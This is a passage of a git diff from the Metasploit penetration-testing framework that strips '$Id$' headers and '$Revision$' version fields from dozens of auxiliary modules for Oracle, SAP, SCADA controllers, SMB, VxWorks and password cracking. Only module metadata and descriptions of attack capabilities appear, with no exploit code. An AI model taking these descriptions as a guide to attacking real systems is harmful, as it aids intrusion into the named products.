'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ], diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 62904cb51a..f3da70fafe 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 52b78aba4e..355047acc7 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary run. }, 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index e4bcae8907..238ea058ae 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5448' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 89ee779b4f..52c28488c5 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1977' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index 0dd1d8d660..7b986fc512 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0904' ], diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index 63056cf04b..2780857532 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 5c101fff3d..0a53dc67af 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ], diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 34e8440607..b46622dfb8 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 191c19afa4..df28ef1bca 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['MC'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Feb 1 2009' )) diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index ce5296b53d..d9e489ceed 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '368' ], diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index bcccfa6b75..9a5d5b1bfb 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ] - ], - 'Version' => '$Revision$' + ] )) register_options( diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 5bb3894345..a79f137279 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'www.postgresql.org' ] - ], - 'Version' => '$Revision$' + ] )) #register_options( [ ], self.class) # None needed. diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index 8538203de9..d70b39b62b 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console OSExecute', - 'Version' => '$Revision$', 'Description' => %q{ This module allows execution of operating system commands through the SAP Management Console SOAP Interface. A valid username and password must be diff --git a/modules/auxiliary/admin/scada/igss_exec_17.rb b/modules/auxiliary/admin/scada/igss_exec_17.rb index 00785bf316..49dd120ba0 100644 --- a/modules/auxiliary/admin/scada/igss_exec_17.rb +++ b/modules/auxiliary/admin/scada/igss_exec_17.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1566'], diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 5729b6ed15..6881b15080 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Apr 5 2012' )) register_options( diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index 6a911e0df3..4492b48c01 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate'=> 'Jan 19 2012' )) diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index ec03727174..dbbda3a618 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Apr 5 2012' )) diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 7b96f8c243..61b1ea6725 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012')) register_options( diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index 6d402b75c2..99e3958e02 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6507' ], diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 97c8706f73..2f2ede0511 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Scanner Check File/Directory Utility', - 'Version' => '$Revision$', 'Description' => %Q{ This module is useful when checking an entire network of SMB hosts for the presence of a known file or directory. diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index cea6e9d7a6..0fdcc1bcad 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Directory Listing Utility', - 'Version' => '$Revision$', 'Description' => %Q{ This module lists the directory of a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index 547f40f145..51e573a53f 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Samba Symlink Directory Traversal', - 'Version' => '$Revision$', 'Description' => %Q{ This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index a661994fea..05c59a80f2 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB File Upload Utility', - 'Version' => '$Revision$', 'Description' => %Q{ This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 9b25f90db8..c0b7da036c 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary 'jduck' # Ported to MSF v3 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0027'], diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index b8b060f594..2b7c008f4b 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '30172'], diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index 3dc28f3c2e..a6c5673815 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 02adc9de8a..4fa05fae59 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 15707975e5..dc9d56a43a 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index d3936bbd78..21f21b7887 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 102bff1018..c23633df4f 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'theLightCosine' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['BID', '17978'], diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index c951f00f91..e715f1abfc 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index 50bf6540ce..26c99bba1a 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index 061bec32f2..174339dc1a 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 2168cc872e..a893d75ae3 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index 7818eba7cb..4bcbf89d22 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '26772'], diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index 92ffde6302..920c4d1f88 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'ikki', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71420'], diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 326cb61f32..1f172392f9 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper AIX Password Cracker', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from passwd files on AIX systems. diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index adc2d86e4f..e0395f84d9 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper Password Cracker (Fast Mode)', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index fab5b42940..6f724bcd85 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper Linux Password Cracker', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 556fc7ab93..233b4efe17 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper MS SQL Password Cracker (Fast Mode)', - 'Version' => "$Revision$", 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index ab8a187178..ceba750a5b 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper MySQL Password Cracker (Fast Mode)', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index 3a9209ba81..683dd9a62d 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper Oracle Password Cracker (Fast Mode)', - 'Version' => "$Revision$", 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from the oracle_hashdump module. Passwords that have been successfully diff --git a/modules/auxiliary/analyze/jtr_unshadow.rb b/modules/auxiliary/analyze/jtr_unshadow.rb index d786d3f984..f3f317eadf 100644 --- a/modules/auxiliary/analyze/jtr_unshadow.rb +++ b/modules/auxiliary/analyze/jtr_unshadow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Unix Unshadow Utility', - 'Version' => "$Revision$", 'Description' => %Q{ This module takes a passwd and shadow file and 'unshadows' them and saves them as linux.hashes loot. diff --git a/modules/auxiliary/analyze/postgres_md5_crack.rb b/modules/auxiliary/analyze/postgres_md5_crack.rb index fb1dd924c6..2e6d33f74f 100644 --- a/modules/auxiliary/analyze/postgres_md5_crack.rb +++ b/modules/auxiliary/analyze/postgres_md5_crack.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Postgres SQL md5 Password Cracker', - 'Version' => '$Revision$', 'Description' => %Q{ This module attempts to crack Postgres SQL md5 password hashes. It creates hashes based on information saved in the MSF Database diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index 49495bf1fd..5c18619acf 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -1,7 +1,3 @@ -### -# $Id$ -### - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,7 +12,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'BNAT Router', - 'Version' => '$Revision$', 'Description' => %q{ This module will properly route BNAT traffic and allow for connections to be established to machines on ports which might not otherwise be accessible.}, diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index eaaff4e2a6..b659524639 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -1,7 +1,3 @@ -### -# $Id$ -### - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'BNAT Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module is a scanner which can detect Broken NAT (network address translation) implementations, which could result in a inability to reach ports on remote diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index f8180e546d..34b17c2937 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary engineering. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://spl0it.org/' ], diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 0a109ae700..5d9af9fc57 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -1,7 +1,5 